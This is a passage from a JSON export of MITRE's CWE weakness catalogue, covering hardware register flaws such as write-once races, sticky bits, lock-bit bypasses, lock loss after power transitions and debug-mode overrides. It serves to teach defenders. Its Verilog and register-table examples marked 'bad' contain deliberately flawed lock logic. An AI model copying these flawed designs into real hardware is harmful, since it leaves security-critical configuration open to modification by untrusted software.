Attributes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make them write-once. This means the hardware implementation only allows writing to such registers once, and they become read-only after having been written once by software. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings.","Implementation issues in hardware design of such controls can expose such registers to a race condition security flaw. For example, consider a hardware design that has two different software/firmware modules executing in parallel. One module is trusted (module A) and another is untrusted (module B). In this design it could be possible for Module B to send write cycles to the write-once register before Module A. Since the field is write-once the programmed value from Module A will be ignored and the pre-empted value programmed by Module B will be used by hardware."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This weakness can appear in designs that use register write-once attributes with two or more software/firmware modules with varying levels of trust executing in parallel."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"System configuration cannot be programmed in a secure way."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design all register write-once or sticky fields must be evaluated for proper configuration."},{"Phase":"Testing","Description":"The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out <= 16\'h0000;Write_once_status <= 1\'b0;endelse if (write & ~Write_once_status)beginData_out <= Data_in & 16\'hFFFE; // Input data written to register after masking bit 0Write_once_status <= 1\'b1; // Write once status set after first write.endelse if (~write)beginData_out[15:1] <= Data_out[15:1];Data_out[0] <= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"Trusted firmware or software trying to set the write-once field.- Must confirm the Write_once_status (bit 0) value is zero, before programming register. If another agent has programmed the register before, then Write_once_status value will be one.- After writing to the register, the trusted software can issue a read to confirm that the valid setting has been programmed.","xhtml:br":["",""]}}],"Body_Text":"The first system component that sends a write cycle to this register can program the value. This could result in a race condition security issue in SoC design, if an untrusted agent is running in the system in parallel with the trusted component that is expected to program the register."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1224":{"attr":{"@_ID":"1224","@_Name":"Improper Restriction of Write-Once Bit Fields","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The hardware design control register \\"sticky bits\\" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to define default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make the settings write-once or \\"sticky.\\" This allows writing to such registers only once, whereupon they become read-only. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings.","Failure to implement write-once restrictions in hardware design can expose such registers to being re-programmed by software and written multiple times. For example, write-once fields could be implemented to only be write-protected if they have been set to value \\"1\\", wherein they would work as \\"write-1-once\\" and not \\"write-once\\"."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":"Varies by Context","Note":"System configuration cannot be programmed in a secure way."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design all register write-once or sticky fields must be evaluated for proper configuration."},{"Phase":"Testing","Description":"The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. This implementation can be for a register that is defined by specification to be a write-once register, since the write_once_status field gets written by input data bit 0 on first write.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out <= 16\'h0000;Write_once_status <= 1\'b0;endelse if (write & ~Write_once_status)beginData_out <= Data_in & 16\'hFFFE;Write_once_status <= Data_in[0]; // Input bit 0 sets Write_once_statusendelse if (~write)beginData_out[15:1] <= Data_out[15:1];Data_out[0] <= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out <= 16\'h0000;Write_once_status <= 1\'b0;endelse if (write & ~Write_once_status)beginData_out <= Data_in & 16\'hFFFE;Write_once_status <= 1\'b1; // Write once status set on first write, independent of inputendelse if (~write)beginData_out[15:1] <= Data_out[15:1];Data_out[0] <= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}}],"Body_Text":"The above example only locks further writes if write_once_status bit is written to one. So it acts as write_1-Once instead of the write-once attribute."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1229":{"attr":{"@_ID":"1229","@_Name":"Creation of Emergent Resource","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product manages resources or behaves in a way that indirectly creates a new, distinct resource that can be used by attackers in violation of the intended policy.","Extended_Description":{"xhtml:p":"A product is only expected to behave in a way that was specifically intended by the developer. Resource allocation and management is expected to be performed explicitly by the associated code. However, in systems with complex behavior, the product might indirectly produce new kinds of resources that were never intended in the original design. For example, a covert channel is a resource that was never explicitly intended by the developer, but it is useful to attackers. \\"Parasitic computing,\\" while not necessarily malicious in nature, effectively tricks a product into performing unintended computations on behalf of another party."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1049"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-01-22"}}},"1230":{"attr":{"@_ID":"1230","@_Name":"Exposure of Sensitive Information Through Metadata","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information.","Extended_Description":{"xhtml:p":"Developers might correctly prevent unauthorized access to a database or other resource containing sensitive information, but they might not consider that portions of the original information might also be recorded in metadata, search indices, statistical reports, or other resources. If these resources are not also restricted, then attackers might be able to extract some or all of the original information, or otherwise infer some details. For example, an attacker could specify search terms that are known to be unique to a particular person, or view metadata such as activity or creation dates in order to identify usage patterns."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-01-26"}}},"1231":{"attr":{"@_ID":"1231","@_Name":"Improper Prevention of Lock Bit Modification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set.","Extended_Description":{"xhtml:p":["In integrated circuits and hardware\\n\\t\\t\\t intellectual property (IP) cores, device configuration\\n\\t\\t\\t controls are commonly programmed after a device power\\n\\t\\t\\t reset by a trusted firmware or software module (e.g.,\\n\\t\\t\\t BIOS/bootloader) and then locked from any further\\n\\t\\t\\t modification.","This behavior is commonly implemented using a trusted lock bit. \\n\\t\\t\\t When set, the lock bit disables writes to a protected set of\\n\\t\\t\\t registers or address regions. Design or coding errors in\\n\\t\\t\\t the implementation of the lock bit protection feature\\n\\t\\t\\t may allow the lock bit to be modified or cleared by\\n\\t\\t\\t software after it has been set. Attackers might be able to unlock the system and\\n\\t\\t\\t features that the bit is intended to protect."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Likelihood":"High","Note":"Registers protected by lock bit can be modified even when lock is set."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Set the lock bit. Power cycle the\\n\\t device. Attempt to clear the lock bit. If the\\n\\t information is changed, implement a design\\n\\t fix. Retest. Also, attempt to indirectly clear the lock\\n\\t bit or bypass it.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security lock bit protections must be reviewed for design inconsistency and common weaknesses.","Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by firmware, and then the register needs to be locked (TEMP_SENSOR_LOCK).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["CRITICAL_TEMP_LIMIT",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125","xhtml:p":""}]},{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. Slope value used to map sensor reading to degrees Centigrade."]},{"xhtml:td":["TEMP_SENSOR_LOCK",{"#text":"[31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT and TEMP_SENSOR_CALIB registers; Write-1-once; Default 0","xhtml:p":""}]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write; Default 0","xhtml:p":""}]},{"xhtml:td":["CURRENT_TEMP",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0","xhtml:p":""}]}]}},{"attr":{"@_Nature":"good"},"xhtml:p":"To fix this weakness, one could change the TEMP_HW_SHUTDOWN field to be locked by TEMP_SENSOR_LOCK.","xhtml:table":{"xhtml:tr":{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0[0] Locked by TEMP_SENSOR_LOCK","xhtml:p":["",""]}]}}}],"Body_Text":"In this example, note that if the system heats to critical temperature, the response of the system is controlled by the TEMP_HW_SHUTDOWN bit [1], which is not lockable. Thus, the intended security property of the critical temperature sensor cannot be fully protected, since software can misconfigure the TEMP_HW_SHUTDOWN register even after the lock bit is set to disable the shutdown response."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-6283","Description":"chip reset clears critical read/write lock permissions for RSA function","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6283"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided observed example"}]}},"1232":{"attr":{"@_ID":"1232","@_Name":"Improper Lock Behavior After Power State Transition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable.","Extended_Description":{"xhtml:p":["Devices may allow device configuration controls which need to be programmed after device power reset via a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. This action is commonly implemented using a programmable lock bit, which, when set, disables writes to a protected set of registers or address regions.","After a power state transition, the lock bit is set to unlocked. Some common weaknesses that can exist in such a protection scheme are that the lock gets cleared, the values of the protected registers get reset, or the lock become programmable."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security Lock bit protections should be reviewed for behavior across supported power state transitions.","Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing including testing across power transitions."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider the memory configuration settings of a system that uses DDR3 DRAM memory. Protecting the DRAM memory configuration from modification by software is required to ensure that system memory access control protections cannot be bypassed. This can be done by using lock bit protection that locks all of the memory configuration registers. The memory configuration lock can be set by the BIOS during the boot process.","If such a system also supports a rapid power on mode like hibernate, the DRAM data must be saved to a disk before power is removed and restored back to the DRAM once the system powers back up and before the OS resumes operation after returning from hibernate."]},"Body_Text":"To support the hibernate transition back to the operating state, the DRAM memory configuration must be reprogrammed even though it was locked previously. As the hibernate resume does a partial reboot, the memory configuration could be altered before the memory lock is set. Functionally the hibernate resume flow requires a bypass of the lock-based protection. The memory configuration must be securely stored and restored by trusted system firmware. Lock settings and system configuration must be restored to the same state it was in before the device entered into the hibernate mode."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"166"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}]}},"1233":{"attr":{"@_ID":"1233","@_Name":"Security-Sensitive Hardware Controls with Missing Lock Bit Protection","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware intellectual properties (IPs) might provide device configuration controls that need to be programmed after device power reset by a trusted firmware or software module, commonly set by BIOS/bootloader. After reset, there can be an expectation that the controls cannot be used to perform any further modification. This behavior is commonly implemented using a trusted lock bit, which can be set to disable writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration).","However, if the lock bit does not effectively write-protect all system registers or controls that could modify the protected system configuration, then an adversary may be able to use software to access the registers/controls and modify the protected hardware configuration."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Note":"System Configuration protected by the lock bit can be modified even when the lock is set."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Set the lock bit. Attempt to modify the\\n\\t information protected by the lock bit. If the information\\n\\t is changed, implement a design fix. Retest. Also, attempt\\n\\t to indirectly clear the lock bit or bypass\\n\\t it.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security lock bit protections must be reviewed for design inconsistency and common weaknesses.","Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by the firmware.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["CRITICAL_TEMP_LIMIT",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125","xhtml:p":""}]},{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write; Default 25"]},{"xhtml:td":["TEMP_SENSOR_LOCK",{"#text":"[31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT register; Write-1-once; Default 0","xhtml:p":""}]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on a critical temperature detection; Read-write; Default 0","xhtml:p":""}]},{"xhtml:td":["CURRENT_TEMP",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0","xhtml:p":""}]}]}},{"attr":{"@_Nature":"good"},"xhtml:p":"Change TEMP_HW_SHUTDOWN and TEMP_SENSOR_CALIB controls to be locked by TEMP_SENSOR_LOCK.","xhtml:table":{"xhtml:tr":[{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write-Lock; Default 25; Locked by TEMP_SENSOR_LOCK bit[0]"]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0; Locked by TEMP_SENSOR_LOCK bit[0]","xhtml:p":""}]}]}}],"Body_Text":{"xhtml:p":["In this example note that only the CRITICAL_TEMP_LIMIT register is protected by the TEMP_SENSOR_LOCK bit, while the security design intent is to protect any modification of the critical temperature detection and response.","The response of the system, if the system heats to a critical temperature, is controlled by TEMP_HW_SHUTDOWN bit [1], which is not lockable. Also, the TEMP_SENSOR_CALIB register is not protected by the lock bit.","By modifying the temperature sensor calibration, the conversion of the sensor data to a degree centigrade can be changed, such that the current temperature will never be detected to exceed critical temperature value programmed by the protected lock.","Similarly, by modifying the TEMP_HW_SHUTDOWN.Enable bit, the system response detection of the current temperature exceeding critical temperature can be disabled."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-9085","Description":"Certain servers leave a write protection lock bit\\n\\t\\tunset after boot, potentially allowing modification of\\n\\t\\tparts of flash memory.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9085"},{"Reference":"CVE-2014-8273","Description":"Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1237"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"}}},"1234":{"attr":{"@_ID":"1234","@_Name":"Hardware Internal or Debug Modes Allow Override of Locks","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"System configuration protection may be bypassed during debug mode.","Extended_Description":{"xhtml:p":"Device configuration controls are commonly programmed after a device power reset by a trusted firmware or software module (e.g., BIOS/bootloader) and then locked from any further modification. This is commonly implemented using a trusted lock bit, which when set, disables writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration). If debug features supported by hardware or internal modes/system states are supported in the hardware design, modification of the lock protection may be allowed allowing access and modification of configuration information."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"Bypass of lock bit allows access and modification of system configuration even when the lock bit is set."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security Lock bit protections should be reviewed for any bypass/override modes supported.","Any supported override modes either should be removed or protected using authenticated debug modes.","Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"#text":"For example, consider the example Locked_override_register example. This register module supports a lock mode that blocks any writes after lock is set to 1.However, it also allows override of the lock protection when scan_mode or debug_unlocked modes are active.","xhtml:br":""},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:p":["module Locked_register_example","(",{"#text":"input [15:0] Data_in,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input Clk,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input resetn,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input write,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input Lock,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input scan_mode,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input debug_unlocked,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"output reg [15:0] Data_out","attr":{"@_style":"text-indent: 15px;"}},");","","reg lock_status;","","always @(posedge Clk or negedge resetn)","if (~resetn) // Register is reset resetn",{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status <= 1\'b0;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (Lock)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status <= 1\'b1;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (~Lock)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status <= lock_status","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},"","always @(posedge Clk or negedge resetn)",{"#text":"if (~resetn) // Register is reset resetn","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 